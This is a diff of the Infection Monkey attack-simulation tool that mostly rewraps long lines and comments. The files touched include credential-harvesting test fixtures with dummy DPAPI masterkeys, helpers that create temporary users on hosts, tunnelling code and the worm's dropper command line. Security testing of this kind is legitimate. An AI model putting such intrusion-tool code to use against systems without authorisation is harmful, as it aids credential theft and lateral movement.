infection_monkey.system_info.collectors class, and override
the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the
collector to the configuration
as well - see monkey_island.cc.services.processing.system_info_collectors for examples.
See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide.
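
Following that recipe, a hypothetical collector would look roughly like this; the class is made up and the base-class constructor signature is an assumption, with the real registration happening in the configuration and island-side processing mentioned above:

import socket

class HostnameCollector(SystemInfoCollector):        # hypothetical example collector
    def __init__(self):
        super().__init__(name="HostnameCollector")    # assumed base-class signature

    def collect(self) -> dict:
        return {"hostname": socket.gethostname()}
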

View File

@ -24,9 +24,8 @@ class SystemInfoCollectorsHandler(object):
# If we failed one collector, no need to stop execution. Log and continue.
LOG.error("Collector {} failed. Error info: {}".format(collector.name, e))
LOG.info(
"All system info collectors executed. Total {} executed, out of which {} collected successfully.".format(
len(self.collectors_list), successful_collections
)
"All system info collectors executed. Total {} executed, out of which {} "
"collected successfully.".format(len(self.collectors_list), successful_collections)
)
SystemInfoTelem({"collectors":system_info_telemetry}).send()

View File

@ -56,7 +56,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
@ -64,7 +65,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
@ -72,7 +74,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,
@ -80,7 +83,8 @@ class TestPypykatzHandler(TestCase):
{
"credtype":"dpapi",
"key_guid":"9123-123ae123de4-121239-3123-421f",
"masterkey": "6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"masterkey":
"6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975e"
"f051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9",
"sha1_masterkey":"bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da",
"luid":123086,

View File

@ -44,7 +44,8 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle:
LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:

View File

@ -3,7 +3,8 @@ from infection_monkey.telemetry.attack.usage_telem import AttackTelem
class T1064Telem(AttackTelem):
def __init__(self, status, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1064 telemetry.
:param status: ScanStatus of technique

View File

@ -5,7 +5,8 @@ __author__ = "itay.mizeretz"
class T1197Telem(VictimHostTelem):
def __init__(self, status, machine, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1197 telemetry.
:param status: ScanStatus of technique

View File

@ -9,6 +9,7 @@ LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged
__author__ = "itay.mizeretz"
# TODO: Rework the interface for telemetry; this class has too many responsibilities
# (i.e. too many reasons to change):
#

View File

@ -173,7 +173,8 @@ class MonkeyTunnel(Thread):
LOG.info("Stopping tunnel, waiting for clients: %s" % repr(self._clients))
# wait till all of the tunnel clients has been disconnected, or no one used the tunnel in QUIT_TIMEOUT seconds
# wait till all of the tunnel clients has been disconnected, or no one used the tunnel in
# QUIT_TIMEOUT seconds
while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT):
try:
search, address = self._broad_sock.recvfrom(BUFFER_READ)

View File

@ -8,8 +8,10 @@ class AutoNewUser(metaclass=abc.ABCMeta):
"""
RAII object to use for creating and using a new user. Use with `with`.
User will be created when the instance is instantiated.
User will be available for use (log on for Windows, for example) at the start of the `with` scope.
User will be removed (deactivated and deleted for Windows, for example) at the end of said `with` scope.
User will be available for use (log on for Windows, for example) at the start of the `with`
scope.
User will be removed (deactivated and deleted for Windows, for example) at the end of said
`with` scope.
Example:
# Created # Logged on

View File

@ -5,13 +5,15 @@ from infection_monkey.utils.windows.users import AutoNewWindowsUser
def create_auto_new_user(username, password, is_windows=is_windows_os()):
"""
Factory method for creating an AutoNewUser. See AutoNewUser's documentation for more information.
Factory method for creating an AutoNewUser. See AutoNewUser's documentation for more
information.
Example usage:
with create_auto_new_user(username, PASSWORD) as new_user:
...
:param username: The username of the new user.
:param password: The password of the new user.
:param is_windows: If True, a new Windows user is created. Otherwise, a Linux user is created. Leave blank for
:param is_windows: If True, a new Windows user is created. Otherwise, a Linux user is
created. Leave blank for
automatic detection.
:return: The new AutoNewUser object - use with a `with` scope.
"""

View File

@ -14,7 +14,8 @@ def get_linux_commands_to_add_user(username):
"-M", # Do not create homedir
"--expiredate", # The date on which the user account will be disabled.
datetime.datetime.today().strftime("%Y-%m-%d"),
"--inactive", # The number of days after a password expires until the account is permanently disabled.
"--inactive",
# The number of days after a password expires until the account is permanently disabled.
"0", # A value of 0 disables the account as soon as the password has expired
"-c", # Comment
"MONKEY_USER", # Comment

View File

@ -47,12 +47,14 @@ class AutoNewWindowsUser(AutoNewUser):
import win32security
try:
# Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera
# Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf
# -winbase-logonusera
self.logon_handle = win32security.LogonUser(
self.username,
".", # Use current domain.
self.password,
win32con.LOGON32_LOGON_INTERACTIVE, # Logon type - interactive (normal user), since we're using a shell.
win32con.LOGON32_LOGON_INTERACTIVE,
# Logon type - interactive (normal user), since we're using a shell.
win32con.LOGON32_PROVIDER_DEFAULT,
) # Which logon provider to use - whatever Windows offers.
except Exception as err:
@ -80,12 +82,17 @@ class AutoNewWindowsUser(AutoNewUser):
thread_handle = proc_info.hThread
logger.debug(
"Waiting for process to finish. Timeout: {}ms".format(WAIT_TIMEOUT_IN_MILLISECONDS)
"Waiting for process to finish. Timeout: {}ms".format(
WAIT_TIMEOUT_IN_MILLISECONDS)
)
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f-408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject?forum=vcgeneral
# Ignoring return code, as we'll use `GetExitCode` to determine the state of the process later.
_ = win32event.WaitForSingleObject( # Waits until the specified object is signaled, or time-out.
# https://social.msdn.microsoft.com/Forums/vstudio/en-US/b6d6a7ae-71e9-4edb-ac8f
# -408d2a41750d/what-events-on-a-process-handle-signal-satisify-waitforsingleobject
# ?forum=vcgeneral
# Ignoring return code, as we'll use `GetExitCode` to determine the state of the
# process later.
_ = win32event.WaitForSingleObject(
# Waits until the specified object is signaled, or time-out.
process_handle, # Ping process handle
WAIT_TIMEOUT_IN_MILLISECONDS, # Timeout in milliseconds
)

View File

@ -46,7 +46,8 @@ class WindowsUpgrader(object):
)
monkey_cmdline = (
MONKEY_CMDLINE_WINDOWS % {"monkey_path": WormConfiguration.dropper_target_path_win_64}
MONKEY_CMDLINE_WINDOWS % {
"monkey_path":WormConfiguration.dropper_target_path_win_64}
+ monkey_options
)

View File

@ -62,11 +62,13 @@ def serve_static_file(static_path):
try:
return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, "cc/ui/dist"), static_path)
except NotFound:
# Because react uses various urls for same index page, this is probably the user's intention.
# Because react uses various urls for same index page, this is probably the user's
# intention.
if static_path == HOME_FILE:
flask_restful.abort(
Response(
"Page not found. Make sure you ran the npm script and the cwd is monkey\\monkey.",
"Page not found. Make sure you ran the npm script and the cwd is "
"monkey\\monkey.",
500,
)
)
@ -82,11 +84,13 @@ def init_app_config(app, mongo_url):
# See https://flask-jwt-extended.readthedocs.io/en/stable/options
app.config["JWT_ACCESS_TOKEN_EXPIRES"] = env_singleton.env.get_auth_expiration_time()
# Invalidate the signature of JWTs if the server process restarts. This avoids the edge case of getting a JWT,
# Invalidate the signature of JWTs if the server process restarts. This avoids the edge case
# of getting a JWT,
# deciding to reset credentials and then still logging in with the old JWT.
app.config["JWT_SECRET_KEY"] = str(uuid.uuid4())
# By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK matrix in the
# By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK
# matrix in the
# configuration. See https://flask.palletsprojects.com/en/1.1.x/config/#JSON_SORT_KEYS.
app.config["JSON_SORT_KEYS"] = False
@ -101,7 +105,8 @@ def init_app_services(app):
database.init()
Database.init_db()
# If running on AWS, this will initialize the instance data, which is used "later" in the execution of the island.
# If running on AWS, this will initialize the instance data, which is used "later" in the
# execution of the island.
RemoteRunAwsService.init()

View File

@ -5,7 +5,6 @@ __author__ = "itay.mizeretz"
class AwsEnvironment(Environment):
_credentials_required = True
def __init__(self, config):

View File

@ -4,7 +4,6 @@ __author__ = "itay.mizeretz"
class PasswordEnvironment(Environment):
_credentials_required = True
def get_auth_users(self):

View File

@ -5,7 +5,6 @@ __author__ = "itay.mizeretz"
class StandardEnvironment(Environment):
_credentials_required = False
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'

View File

@ -4,7 +4,8 @@ from monkey_island.cc.environment import Environment, EnvironmentConfig
class TestingEnvironment(Environment):
"""
Use this environment for running Unit Tests.
This will cause all mongo connections to happen via `mongomock` instead of using an actual mongodb instance.
This will cause all mongo connections to happen via `mongomock` instead of using an actual
mongodb instance.
"""
_credentials_required = True

View File

@ -5,7 +5,8 @@ import time
from pathlib import Path
from threading import Thread
# Add the monkey_island directory to the path, to make sure imports that don't start with "monkey_island." work.
# Add the monkey_island directory to the path, to make sure imports that don't start with
# "monkey_island." work.
from gevent.pywsgi import WSGIServer
MONKEY_ISLAND_DIR_BASE_PATH = str(Path(__file__).parent.parent)
@ -48,7 +49,6 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P
def start_island_server(should_setup_only):
mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url())
wait_for_mongo_db_server(mongo_url)
assert_mongo_db_version(mongo_url)

View File

@ -4,7 +4,8 @@ import monkey_island.cc.environment.environment_singleton as env_singleton
from .command_control_channel import CommandControlChannel # noqa: F401
# Order of importing matters here, for registering the embedded and referenced documents before using them.
# Order of importing matters here, for registering the embedded and referenced documents before
# using them.
from .config import Config # noqa: F401
from .creds import Creds # noqa: F401
from .monkey import Monkey # noqa: F401

View File

@ -8,7 +8,6 @@ from monkey_island.cc.services.attack.test_mitre_api_interface import MitreApiIn
class AttackMitigations(Document):
COLLECTION_NAME = "attack_mitigations"
technique_id = StringField(required=True, primary_key=True)

View File

@ -5,7 +5,6 @@ from monkey_island.cc.services.attack.test_mitre_api_interface import MitreApiIn
class Mitigation(EmbeddedDocument):
name = StringField(required=True)
description = StringField(required=True)
url = StringField()

View File

@ -2,7 +2,6 @@ from mongoengine import BooleanField, Document, DynamicField, ListField, ObjectI
class Edge(Document):
meta = {"allow_inheritance":True}
# SCHEMA

View File

@ -26,8 +26,10 @@ MAX_MONKEYS_AMOUNT_TO_CACHE = 100
class Monkey(Document):
"""
This class has 2 main section:
* The schema section defines the DB fields in the document. This is the data of the object.
* The logic section defines complex questions we can ask about a single document which are asked multiple
* The schema section defines the DB fields in the document. This is the data of the
object.
* The logic section defines complex questions we can ask about a single document which
are asked multiple
times, somewhat like an API.
"""
@ -42,7 +44,8 @@ class Monkey(Document):
ip_addresses = ListField(StringField())
keepalive = DateTimeField()
modifytime = DateTimeField()
# TODO make "parent" an embedded document, so this can be removed and the schema explained (and validated) verbosely.
# TODO make "parent" an embedded document, so this can be removed and the schema explained (
# and validated) verbosely.
# This is a temporary fix, since mongoengine doesn't allow for lists of strings to be null
# (even with required=False of null=True).
# See relevant issue: https://github.com/MongoEngine/mongoengine/issues/1904
@ -146,7 +149,8 @@ class Monkey(Document):
return {"ips":self.ip_addresses, "hostname":self.hostname}
@ring.lru(
expire=1 # data has TTL of 1 second. This is useful for rapid calls for report generation.
expire=1
# data has TTL of 1 second. This is useful for rapid calls for report generation.
)
@staticmethod
def is_monkey(object_id):

View File

@ -7,10 +7,12 @@ class MonkeyTtl(Document):
"""
This model represents the monkey's TTL, and is referenced by the main Monkey document.
See https://docs.mongodb.com/manual/tutorial/expire-data/ and
https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents/56021663#56021663
https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired
-documents/56021663#56021663
for more information about how TTL indexing works and why this class is set up the way it is.
If you wish to use this class, you can create it using the create_ttl_expire_in(seconds) function.
If you wish to use this class, you can create it using the create_ttl_expire_in(seconds)
function.
If you wish to create an instance of this class directly, see the inner implementation of
create_ttl_expire_in(seconds) to see how to do so.
"""
@ -20,11 +22,13 @@ class MonkeyTtl(Document):
"""
Initializes a TTL object which will expire in expire_in_seconds seconds from when created.
Remember to call .save() on the object after creation.
:param expiry_in_seconds: How long should the TTL be in the DB, in seconds. Please take into consideration
:param expiry_in_seconds: How long should the TTL be in the DB, in seconds. Please take
into consideration
that the cleanup thread of mongo might take extra time to delete the TTL from the DB.
"""
# Using UTC to make the mongodb TTL feature work. See
# https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents.
# https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired
# -documents.
return MonkeyTtl(expire_at=datetime.utcnow() + timedelta(seconds=expiry_in_seconds))
meta = {"indexes":[{"name":"TTL_index", "fields":["expire_at"], "expireAfterSeconds":0}]}
@ -35,7 +39,8 @@ class MonkeyTtl(Document):
def create_monkey_ttl_document(expiry_duration_in_seconds):
"""
Create a new Monkey TTL document and save it as a document.
:param expiry_duration_in_seconds: How long should the TTL last for. THIS IS A LOWER BOUND - depends on mongodb
:param expiry_duration_in_seconds: How long should the TTL last for. THIS IS A LOWER BOUND -
depends on mongodb
performance.
:return: The TTL document. To get its ID use `.id`.
"""

View File

@ -26,7 +26,8 @@ class TestMonkey:
mia_monkey_ttl.save()
mia_monkey = Monkey(guid=str(uuid.uuid4()), dead=False, ttl_ref=mia_monkey_ttl.id)
mia_monkey.save()
# Emulate timeout - ttl is manually deleted here, since we're using mongomock and not a real mongo instance.
# Emulate timeout - ttl is manually deleted here, since we're using mongomock and not a
# real mongo instance.
sleep(1)
mia_monkey_ttl.delete()

View File

@ -7,12 +7,15 @@ import common.common_consts.zero_trust_consts as zero_trust_consts
class Event(EmbeddedDocument):
"""
This model represents a single event within a Finding (it is an EmbeddedDocument within Finding). It is meant to
This model represents a single event within a Finding (it is an EmbeddedDocument within
Finding). It is meant to
hold a detail of the Finding.
This class has 2 main section:
* The schema section defines the DB fields in the document. This is the data of the object.
* The logic section defines complex questions we can ask about a single document which are asked multiple
* The schema section defines the DB fields in the document. This is the data of the
object.
* The logic section defines complex questions we can ask about a single document which
are asked multiple
times, or complex action we will perform - somewhat like an API.
"""

View File

@ -12,20 +12,24 @@ import common.common_consts.zero_trust_consts as zero_trust_consts
class Finding(Document):
"""
This model represents a Zero-Trust finding: A result of a test the monkey/island might perform to see if a
This model represents a Zero-Trust finding: A result of a test the monkey/island might
perform to see if a
specific principle of zero trust is upheld or broken.
Findings might have the following statuses:
Failed
Meaning that we are sure that something is wrong (example: segmentation issue).
Verify
Meaning that we need the user to check something himself (example: 2FA logs, AV missing).
Meaning that we need the user to check something himself (example: 2FA logs,
AV missing).
Passed
Meaning that we are sure that something is correct (example: Monkey failed exploiting).
This class has 2 main section:
* The schema section defines the DB fields in the document. This is the data of the object.
* The logic section defines complex questions we can ask about a single document which are asked multiple
* The schema section defines the DB fields in the document. This is the data of the
object.
* The logic section defines complex questions we can ask about a single document which
are asked multiple
times, or complex action we will perform - somewhat like an API.
"""

View File

@ -8,7 +8,6 @@ from monkey_island.cc.models.zero_trust.event import Event
class MonkeyFindingDetails(Document):
# SCHEMA
events = EmbeddedDocumentListField(document_type=Event, required=False)

Some files were not shown because too many files have changed in this diff.